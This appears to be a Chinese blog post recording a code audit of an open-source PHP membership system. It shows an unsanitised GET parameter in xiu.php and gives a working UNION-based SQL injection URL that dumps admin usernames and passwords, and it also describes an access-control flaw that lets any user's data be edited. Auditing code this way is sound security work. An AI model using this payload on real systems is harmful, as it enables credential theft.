2. 程式人生 > >記一次簡單的程式碼審計

記一次簡單的程式碼審計

阿新 發佈:2018-12-08

這段時間在想著做個高校的會員管理系統,所以在chrome上裝了個掘金外掛,今天發現日推推了個類似的PHP寫的小程式

本著能省就省,有自行車還造什麼輪子的原則
於是乎

git clone https://github.com/chaodada/member.git

經過簡單的部署後算是能打開了



後臺UI做的真心差評

然後簡單的看了下程式碼,發現幾個SQL注入和一個越權

SQL注入

程式使用PDO連線資料庫,後臺使用了預編譯SQL指令,沒多大問題
看看前臺使用者處
xiu.php

if (isset($_GET['id'])) {
    $sql = "select id,username,password,integral,**,email from u_users WHERE 1=1 and id={$_GET['id']} ";
    $res = $pdo->query($sql);
    list($id, $username, $password, $integral, $**, $email) = $res->fetch(PDO::FETCH_NUM);
}

很明顯的GET型注入
爆管理員密碼的payload:

http://localhost/member-master/member-master/user/xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23

越權

同樣還是剛才那個位置


id修改後即可更改任意使用者資訊

總結

這套程式距離實用還有不小的距離 適合入門級選手審計練手
程式下載地址:https://github.com/chaodada/member.git

相關推薦

簡單程式碼審計

這段時間在想著做個高校的會員管理系統,所以在chrome上裝了個掘金外掛,今天發現日推推了個類似的PHP寫的小程式 本著能省就省,有自行車還造什麼輪子的原則 於是乎 git clone https://github.com/chaodada/member.git 經過簡單的部署後算是能打開了

zabbix簡單的部署包方式安裝

報錯 article 上海 使用 shang http 配置文件 火墻 安裝mysql zabbix記一次簡單的部署包方式安裝一次過 記一次部署包方式安裝一次過 環境centos7 zabbix 3.2.11 準備工作 關閉防火墻 systemctl stop fire

簡單的破解程式(逆向)

已投稿合天 載入以後然後隨便輸入一個密碼然後在程式中搜索報錯資訊。 例如如下搜尋的:   然後雙擊進入。 然後發現JE將其修改為JEN(JE是==,而JEN是!=,如此便打破了原有的邏輯) 右鍵編輯->二進位制編輯 將74改為75(這裡所說的74、75就是JE

簡單的日誌分析

  題目檔案:https://files.cnblogs.com/files/nul1/access.log.tar 直接搜尋flag發現是一題關於二分法注入。 頁面為200的位元組大小為1765,所以可以通過讀取每行判斷是否有1765以及有沒有flag的關鍵字樣,進而提取值。 指令碼如

簡單爬蟲(豆瓣/dytt)

  磕磕絆絆學python一個月,這次到正則表示式終於能寫點有趣的東西,在此作個記錄:   —————————————————————————————————————————————————   1.爬取豆瓣電影榜前250名單   執行環境: pycha

簡單的UITableView卡頓優化

先說需求,要做一個類似這種的列表 標籤控制元件直接用的第三方 p.p1 { margin: 0.0px 0.0px 0.0px 0.0px; font: 18.0px Menlo; color: #3f6e74; background-color: #e1ffde } YZTagList &nbs

ThinkPHP原始碼審計

一、寫在前面 週末閒得蛋疼,審了一套朋友給的系統,過程挺有意思的,開始的時候覺得基於TP3.0二次開發的系統應該是蠻簡單的,畢竟TP爆了很多漏洞。後來發現開發做了不少安全措施。因此記錄一下這次審計,當時自己學習的記錄吧。 二、後臺注入 最開始的時候,因為快吃飯了,就用RIPS掃了掃(事實證明,沒有什麼毛用)

簡單的sql註入

-- 截圖 是否有效 src bsp 構造 mage nbsp inf 什麽是sql註入攻擊? 所謂SQL註入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用

簡單的SQL注入

參考:http://103.238.227.13:10083/ bugku 可以看到編碼是gb2312 測試注入點 id=1和id=1‘ 都沒錯 應該是寬位元組注入,在試試 id=%df’ 報錯 接著來 輸入欄位id=%df’ union se

業務程式碼的重構

業務需求 收聽任務側面的提示語根據使用者收聽時長和任務的完成情況進行動態提示。 流程圖如下 客戶端的虛擬碼 重構前程式碼點評

髮卡網程式碼審計

## 前言 好胸弟檸楓昨天dd了我一下,這不,叫我一起審計髮卡的cms ![img](https://mmbiz.qpic.cn/mmbiz_png/7iaqAAk8CR9DQqITZ76plJCKRmnIByQtrMMiauN4kgslYKib6AhBmczz654Ricrn6VvA7GemCY4nBq

git硬reset導致的程式碼消失

    最近專案比較敢,心情煩躁,想取消一個commit,於是不知咋地鬼使神差地reset current brand to here,就這樣        還點了hard     然後,辛苦寫的程式碼就這樣沒有了...            此次反映出自己對checkout,r

對YxtCMF簡單審計

一個小眾的cms,下載地址:http://down.admin5.com/php/133101.html YxtCMF v2.2.0是thinkphp+bootstrap為框架進行開發的網路學習平臺系統,有兩處注入,不過都是需要會員登陸 由於網站沒有對注入進

讀大話設計模式有感-程式碼重構歷程

問題:為什麼要程式碼重構? 最近,專案底層資料庫升級,用的庫呢是當下最熱門的hadoop生態系統。資料庫部門丟了兩差異文件給我們寫應用的,心想語法不會改動太大,大不了就是ctrl+r替換點關鍵字啥的。在制定mmp時,自信滿滿的跟經理報了一個很短的時間。 開始時,一切還挺順

掛馬清除經歷:處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬

昨天發現 一臺伺服器突然慢了 top 顯示 幾個程序100%以上的cpu使用 執行命令為 : /tmp/php  -s /tmp/p2.conf 基本可以確定是被掛馬了 下一步確定來源  last 沒有登陸記錄 先幹掉這幾個程序,但是幾分鐘之後又出

java socket學習(簡單實用多執行緒,實現多對多群聊)

學習過程是艱苦,學習結束是快樂的 目錄 用 [TOC]來生成目錄: 本來想寫一些文字描述描述,可是想不出來說啥。。。所以直接記錄程式碼了。。。 程式碼塊 因為喜歡把常量都提取出來 所以上來就是常量類: public class Const

【SQLServer】資料遷移-標識重複的簡單處理

今天在資料遷移的時候因為手賤遇到一個坑爹問題,發來大家樂樂,也傳授新手點經驗 遷移慣用就是臨時表或者新庫,經常用的語法有很多,這次主要說的是這個:select * into 資料庫名..表名 from xxx 先不扯了,先看錯誤: 趕緊看看是不是資料重複~事實證明,木有重複資料。。。 有人

簡單Python爬蟲程式碼記錄

順手記錄一次簡單Python爬蟲程式碼,留以後備用 #!/usr/bin/python # -*- coding: UTF-8 -*- import cookielib import urllib2 from urllib import urlencode i

學習配置叢集eureka,註冊生成者、消費端,實現簡單的服務呼叫

總結一次基於SpringCloud,Greenwich.SR2版本部署叢集eureka,註冊生產者、消費者並進行簡單呼叫的流程。

【年前最後波裝逼】阿里面試,我是如何用一行程式碼解決約瑟夫環問題的

約瑟夫環問題算是很經典的題了,估計大家都聽說過,然後我就在一次筆試中遇到了,下面我就用 3 種方法來詳細講解一下這道題,最後一種方法學了之後保證讓你可以讓你裝逼。 問題描述:編號為 1-N 的 N 個士兵圍坐在一起形成一個圓圈,從編號為 1 的士兵開始依次報數(1,2,3...這樣依次報),數到 m 的 士